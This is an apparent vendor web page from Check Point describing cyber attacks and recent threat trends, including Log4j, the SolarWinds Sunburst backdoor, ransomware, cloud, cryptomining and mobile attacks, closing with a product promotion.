A cyber attack is an assault launched by cybercriminals using one or more computers against a single or multiple computers or networks. A cyber attack can maliciously disable computers, steal data, or use a breached computer as a launch point for other attacks. Cybercriminals use a variety of methods to launch a cyber attack, including malware, phishing, ransomware, denial of service, among other methods.
Check Point Research (CPR) has released information on cyber attacks that have been seen in the context of the ongoing Russia-Ukraine conflict. In the first three days of battle, cyber attacks on Ukraine’s government and military sector increased by an astounding 196%. The number of cyber attacks on Russian businesses has climbed by 4%.
Phishing emails in East Slavic languages grew sevenfold, with a third of those malicious phishing emails being sent from Ukrainian email addresses to Russian receivers.
A severe remote code execution (RCE) vulnerability in the Apache logging package Log4j 2 versions 2.14.1 and below was reported on December 9th 2021 (CVE-2021-44228). With over 400,000 downloads from its GitHub repository, Apache Log4j is the most popular java logging package. It is used by a large number of enterprises throughout the world and allows users to log in to a variety of popular applications. It’s easy to exploit this flaw, which allows threat actors to take control of java-based web servers and perform remote code execution assaults.
The world is now facing what seems to be a 5th generation cyber-attack – a sophisticated, multi-vector attack with clear characteristics of the cyber pandemic. Named Sunburst by researchers, we believe this is one of the most sophisticated and severe attacks ever seen. The attack has been reported to impact major US government offices as well as many private sector organizations.
This series of attacks was made possible when hackers were able to embed a backdoor into SolarWinds software updates. Over 18,000 companies and government offices downloaded what seemed to be a regular software update on their computers, but was actually a Trojan horse. By leveraging a common IT practice of software updates, the attackers utilized the backdoor to compromise the organization’s assets enabling them to spy on the organization and access its data. For more information visit our Sunburst attack hub.
The resurgence of ransomware has been growing. Small local and state government agencies, mainly in the southeastern part of the U.S., have been victimized. Digital transformation is eroding traditional network perimeters with the adoption of cloud computing, cloud-based subscription services, and the ubiquity of mobile devices. This increased expansion of vectors means more ways to attack an organization.
In Q3 2020 Check Point Research saw a 50% increase in the daily average of ransomware attacks, compared to the first half of the year, Organizations worldwide were under a massive wave of ransomware attacks, with healthcare as the most targeted industry
As these attacks continue to mature both in frequency and intensity, their impact on business has grown exponentially. The Top ransomware types were Maze and Ryuk
Cyber threats of generation V and VI are now a reality for businesses. Cybercriminals are aware of recent advancements in company cybersecurity and have adapted their attacks to circumvent and defeat traditional safeguards. To avoid detection, modern cyber attacks are multi-vectored and use polymorphic code. As a result, detecting and responding to threats is more challenging than ever.
Cybercriminals’ primary target and an organization’s first line of defense in the remote work world is the endpoint. Securing the remote workforce necessitates an understanding of the most common cyber risks that employees experience, as well as endpoint security solutions capable of detecting, preventing, and resolving these assaults.
Cyberattacks come in a variety of different forms. Cybercriminals use many different methods to launch a cyber attack, a phishing attack, an exploitation of compromised credentials, and more. From this initial access, cybercriminals can go on to achieve different objectives including malware infections, ransomware, denial of service attack, data theft, and more.
In its mid-year report, Check Point Research provides analysis of the first half of 2021, looking at global cyber attack trends in malware overall, ransomware, and mobile and cloud malware.
Trend #1: Software supply chain attacks on the rise
In software supply chain attacks, the threat actor typically installs malicious code into legitimate software by modifying and infecting one of the building blocks the software relies upon. As with physical chains, software supply chains are only as strong as their weakest link.
Software supply chain attacks can be divided into two main categories. The first includes targeted attacks aiming to compromise well-defined targets, scanning their suppliers list in search of the weakest link through which they could enter. For example, the SolarWinds hack which we will get into below, provided attackers with a path to exploiting many large and high-profile organizations.
In the second category, software supply chains are used to compromise as many victims as possible by locating a weak link with a large distribution radius. An example of such an attack is the Kaseya hack, cybercriminals exploited software used by Managed Services Providers (MSPs) to gain access to their customers’ networks.
Trend #2: Ransomware attacks are not going away
Ransomware has become a top-of-mind cybersecurity concern for many organizations in recent years. This malware places corporate data and operations at risk and carries a high price tag for recovery.
The widespread success of these attacks has driven growth and innovation in the ransomware industry. As long as ransomware attacks continue to be highly profitable, ransomware operators will continue to refine their techniques and malware and carry out their attacks.
Trend #3: Clouds under attack
The growing popularity of public cloud environments has led to an increase of cyber attacks targeting resources and sensitive data residing within these platforms. Misconfiguration and poor management of cloud resources remain the most prominent threat to the cloud ecosystem and were one of the main causes for a vast number of data theft incidents and attacks experienced by organizations worldwide.
Cloud cryptomining campaigns have increased with upgraded techniques capable of evading basic cloud security products. Docker hosts have been exposed and competitors’ cryptomining campaigns operating in the cloud shut down. Check Point researchers also witnessed an increase in the number of exploitations against public cloud infrastructures.
Trend #4: Cryptominers waste corporate resources
Cryptomining or cryptojacking malware is designed to perform cryptocurrency “mining” on infected machines. This mining consumes power and CPU resources to find valid blocks for the blockchain and make money for the attacker.
The popularity of cryptomining malware ebbs and flows, but it is currently making a resurgence. The recent craze around non-fungible tokens (NFTs), which provide ownership of digital assets, has created opportunities for cybercriminals. Fake airdrops claiming to distribute free NFTs actually distribute cryptomining malware to victims’ machines.
Trend #5: Mobile device attacks
The COVID-19 pandemic drove a massive surge in mobile device usage as remote work increased dramatically. As mobile devices became central to business operations, they also gained the attention of cybercriminals.
In 2021, 46% of organizations had an incident in which a malicious mobile app was downloaded to a corporate device. The growing threat of mobile malware as well as a surge in phishing attacks targeting mobile device users (via SMS, email, etc.) has created security risks for nearly all organizations.
Despite the prevalence of cyber attacks, Check Point data suggests that 99 percent of enterprises are not effectively protected. However, a cyber attack is preventable. The key to cyber defense is an end-to-end cyber security architecture that is multilayered and spans all networks, endpoint and mobile devices, and cloud. With the right architecture, you can consolidate management of multiple security layers, control policy through a single pane of glass. This lets you correlate events across all network environments, cloud services, and mobile infrastructures.
In addition to architecture, Check Point recommends these key measures to prevent cyber attacks:
Learn more about recent cyber attack trends by checking out Check Point’s 2021 Mid-Year Cyber Security Report. You’re also welcome to learn how to protect against modern cyber threats by signing up for a free demo of Check Point Harmony Endpoint.